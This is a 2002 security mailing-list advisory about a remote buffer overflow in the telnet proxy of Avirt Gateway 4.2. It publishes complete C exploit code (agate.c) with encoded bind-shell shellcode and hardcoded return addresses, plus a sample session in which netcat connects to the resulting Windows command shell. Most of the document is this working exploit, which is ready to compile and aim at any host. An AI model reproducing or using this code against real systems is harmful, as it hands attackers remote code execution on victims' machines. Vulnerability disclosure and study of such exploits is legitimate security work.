[EXPL] Avirt Gateway Remote Buffer Overflow Proof of Concept

From: support@securiteam.com
Date: 02/16/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 16 Feb 2002 00:01:58 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Avirt Gateway Remote Buffer Overflow Proof of Concept
------------------------------------------------------------------------

SUMMARY

The telnet proxy of the Avirt Gateway v4.2 is vulnerable to a remotely
exploitable buffer overflow that allows execution of arbitrary code.
Entering a String of about 510 bytes at the "Ready>" prompt will overwrite
EIP. Exploit will bind a shell to a specified port on the attacked host.

DETAILS

Vulnerable systems:
Avirt Gateway v4.2 [build 4807] on Windows 2000, SP2

Example:
$ agate 10.0.0.1 7007

Avirt Gateway 4.2 remote exploit by uid0x00 (uid0x00@haked.com)

initialising socket
..initialized
trying to connect
..connected
(waiting)
sending exploit
..sent
(waiting)
..closed
shell bound to port 7007
$ nc -v target 7007
target [10.0.0.1] 7007 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>

Exploit code:
----------------------------------------------------------------------------cut-----------------------------------------------------------------------------
/* agate.c by uid0x00
  * Avirt Gateway 4.2 remote exploit
  * compile with gcc agate.c -o agate
  *
  * tested with win2k, sp2
  *
  * thx to ByteRage, exploit is based on his shellcode
  */

/* Set the following three defines according to the DLL we use */

// MSVCRT.DLL version 6.10.8924.0 (win2K)
#define LoadLibraryRefNEG "\x30\xCF\xFC\x87"
#define GetProcAddressRefADD "\xFC"
#define newEIP "\x60\x32\xFA\x74" // Should JMP/CALL EBX

#include <stdio.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
   int s;
   struct sockaddr_in SockAdr;
   char exploit[1024];
   unsigned short int a_port;

   char shellcode[] =

/* ==== SHELLC0DE START ==== */
/* shellcode based on ByteRage's 450byte code (thx for your help man!) */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x06\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xEB\x06\x90\x90"newEIP"\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE8\xFF\xFF\xFF\xFF"
"\xC0\x5E\xAC\x84\xC0\x75\xFB\x8B\xFE\x33\xC9\xB1\xC1\x4E\x80\x36\x99\xE2\xFA\xBB"LoadLibraryRefNEG
"\xF7\xDB\x56\xFF\x13\x95\xAC\x84\xC0\x75\xFB\x56\x55\xFF\x53"GetProcAddressRefADD"\xAB\xAC"
"\x84\xC0\x75\xFB\xAC\x3C\x21\x74\xE7\x72\x03\x4E\xEB\xEB\x33\xED\x55\x6A\x01\x6A\x02\xFF"
"\x57\xE8\x93\x6A\x10\x56\x53\xFF\x57\xEC\x6A\x02\x53\xFF\x57\xF0\x33\xC0\x57\x50\xB0\x0C"
"\xAB\x58\xAB\x40\xAB\x5F\x55\x57\x56\xAD\x56\xFF\x57\xC0\x55\x57\xAD\x56\xAD\x56\xFF\x57"
"\xC0\xB0\x44\x89\x07\x57\xFF\x57\xC4\x8B\x46\xF4\x89\x47\x3C\x89\x47\x40\xAD\x89\x47\x38"
"\x33\xC0\x89\x47\x30\x66\xB8\x01\x01\x89\x47\x2C\x57\x57\x55\x55\x55\x6A\x01\x55\x55\x56"
"\x55\xFF\x57\xC8\xFF\x76\xF0\xFF\x57\xCC\xFF\x76\xFC\xFF\x57\xCC\x55\x55\x53\xFF\x57\xF4"
"\x93\x33\xC0\xB4\x04\x50\x6A\x40\xFF\x57\xD4\x96\x6A\x50\xFF\x57\xE0\x8B\xCD\xB5\x04\x55"
"\x55\x57\x51\x56\xFF\x77\xAF\xFF\x57\xD0\x8B\x0F\xE3\x18\x55\x57\x51\x56\xFF\x77\xAF\xFF"
"\x57\xDC\x0B\xC0\x74\x21\x55\xFF\x37\x56\x53\xFF\x57\xF8\xEB\xD0\x33\xC0\x50\xB4\x04\x50"
"\x56\x53\xFF\x57\xFC\x55\x57\x50\x56\xFF\x77\xB3\xFF\x57\xD8\xEB\xB9\xFF\x57\xE4\xD2\xDC"
"\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA"
"\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA"
"\xFC\xEA\xEA\xD8\x99\xDA\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xC9\xFC\xFC\xF2\xD7"
"\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6\xFA\x99\xCE"
"\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC\x99\xCA\xF5\xFC\xFC"
"\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xB8\xCE\xCA\xD6\xDA\xD2\xAA\xAB"
"\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA"
"\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD\x99\xEB\xFC\xFA\xEF\x99\x99\x9B\x99\x82\xA1\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xFA\xF4\xFD\x99\x0D\x0A";

/* ==== SHELLC0DE ENDS ==== */

   printf("\nAvirt Gateway 4.2 remote exploit by uid0x00
(uid0x00@haked.com)\n\n");

   if(argc < 3) {
     printf("usage:\t%s <ip#> <port#>\n", argv[0]);
     return 0;
   }

   //insert shell port
   a_port = htons(atoi(argv[2]));
   a_port^= 0x9999;
   shellcode[964] = (a_port) & 0xff;
   shellcode[965] = (a_port >> 8) & 0xff;

   //init the exploit buffer
   memset(&exploit, '\xCC', 0x200);
   memcpy(&exploit, &shellcode, sizeof(shellcode)-1);

   printf("initialising socket\n");
   s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
   if (s) {
     printf("...initialized\n");

     memset(&SockAdr, 0, sizeof(SockAdr));
     SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
     SockAdr.sin_family = AF_INET;
     SockAdr.sin_port = htons(23);

     printf("trying to connect\n");
     if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr))) {
       printf("...connected\n");
       printf("(waiting)\n");
       sleep(3);

       printf("sending exploit\n");
       send(s, exploit, sizeof(exploit), 0);
       printf("...sent\n");

       printf("(waiting)\n");
       sleep(3);

       printf("...closed\nshell bound to port %s \n", argv[2]);
       close(s);
     }
     else {
       printf("... failed :( errno = %i\n", errno);
       close(s);
       return(0);
     }
   }
}
----------------------------------------------------------------------------cut-----------------------------------------------------------------------------

ADDITIONAL INFORMATION

The information has been provided by <mailto:uid0x00@haked.com> uid0x00.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.